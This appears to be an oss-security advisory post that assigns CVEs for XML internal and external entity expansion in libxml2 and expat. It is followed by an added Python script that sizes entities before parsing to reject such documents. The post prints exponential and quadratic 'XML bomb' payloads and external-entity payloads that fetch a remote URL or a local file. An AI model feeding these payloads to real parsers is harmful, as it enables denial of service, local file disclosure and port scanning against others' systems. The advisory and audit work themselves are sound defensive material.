So here are the CVEs for the two big ones, libxml2 and expat. Both
are affected by the expansion of internal entities (which can be used
to consume resources) and external entities (which can cause a denial
of service against other services, be used to port scan, etc.).
To be clear:
====================
Internal entity expansion refers to the exponential/quadratic/fast
linear expansion of XML entities, e.g.:
====================
<!DOCTYPE xmlbomb [
<!ENTITY a "1234567890" >
<!ENTITY b "&a;&a;&a;&a;&a;&a;&a;&a;">
<!ENTITY c "&b;&b;&b;&b;&b;&b;&b;&b;">
<!ENTITY d "&c;&c;&c;&c;&c;&c;&c;&c;">
]>
<bomb>&d;</bomb>
or
<!DOCTYPE bomb [
<!ENTITY a "xxxxxxx... a couple of ten thousand chars">
]>
<bomb>&a;&a;&a;... repeat</bomb>
Which causes resources to be consumed
====================
External entity expansion refers to the loading of external resources
such as XML entities from another server or a local file:
====================
<!DOCTYPE external [
<!ENTITY ee SYSTEM "http://www.example.org/some.xml">
]>
<root>&ee;</root>
<!DOCTYPE external [
<!ENTITY ee SYSTEM "file:///PATH/TO/simple.xml">
]>
<root>&ee;</root>
Which can cause resources to be consumed or can result in port
scanning/application scanning information being sent to the attacker.
So the CVEs to use:
Please use CVE-2013-0338 for libxml2 internal entity expansion
Please use CVE-2013-0339 for libxml2 external entities expansion
Please use CVE-2013-0340 for expat internal entity expansion
Please use CVE-2013-0341 for expat external entities expansion
If you know of other XML libraries that are vulnerable (and open
source =) please let oss-sec know so we can assign CVEs.
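
Added example, not part of the original post: a pre-parse audit using Python's expat bindings that reads only the DTD, computes how large each internal entity and the document body would become from lengths alone (nothing is expanded), and lists external entities. The names audit_entities, REF, SAMPLE and _Stop are introduced here for illustration; it goes beyond the post in handling both internal-expansion forms and recursive declarations.

```python
import re
from xml.parsers import expat

# General entity references (&name;), excluding character references (&#...;).
REF = re.compile(r"&([^#;&\s][^;&\s]*);")
# Constructed sample: the first internal-expansion document from the post.
SAMPLE = b"""<!DOCTYPE xmlbomb [
<!ENTITY a "1234567890" >
<!ENTITY b "&a;&a;&a;&a;&a;&a;&a;&a;">
<!ENTITY c "&b;&b;&b;&b;&b;&b;&b;&b;">
<!ENTITY d "&c;&c;&c;&c;&c;&c;&c;&c;">
]>
<bomb>&d;</bomb>"""

class _Stop(Exception):
    """Raised at the root element so the body is never parsed or expanded."""

def audit_entities(xml_bytes):
    """Return (expanded size per internal entity, external entities, body expansion)."""
    internal, external, body_at = {}, {}, [len(xml_bytes)]
    parser = expat.ParserCreate()

    def on_entity(name, is_param, value, base, system_id, public_id, notation):
        if not is_param and value is None:
            external[name] = system_id  # SYSTEM/PUBLIC entity, loaded from elsewhere
        elif not is_param:
            internal[name] = value      # stored with its &refs; still unexpanded
    def on_root(tag, attrs):
        body_at[0] = parser.CurrentByteIndex  # byte offset of the root start tag
        raise _Stop

    parser.EntityDeclHandler, parser.StartElementHandler = on_entity, on_root
    try:
        parser.Parse(xml_bytes, True)
    except _Stop:
        pass

    sizes = {}
    def size(name, stack=()):
        if name in stack:
            raise ValueError("recursive entity: " + name)
        if name in internal and name not in sizes:
            text = internal[name]
            sizes[name] = len(REF.sub("", text)) + sum(
                size(ref, stack + (name,)) for ref in REF.findall(text))
        return sizes.get(name, 0)  # undeclared names count as 0
    per_entity = {n: size(n) for n in internal}
    body = xml_bytes[body_at[0]:].decode("utf-8", "replace")
    return per_entity, external, sum(size(r) for r in REF.findall(body))
```

A caller would refuse the document when the external-entity map is non-empty or when any size exceeds a limit it chooses; the body figure is what catches the second form, where one large entity is referenced many times.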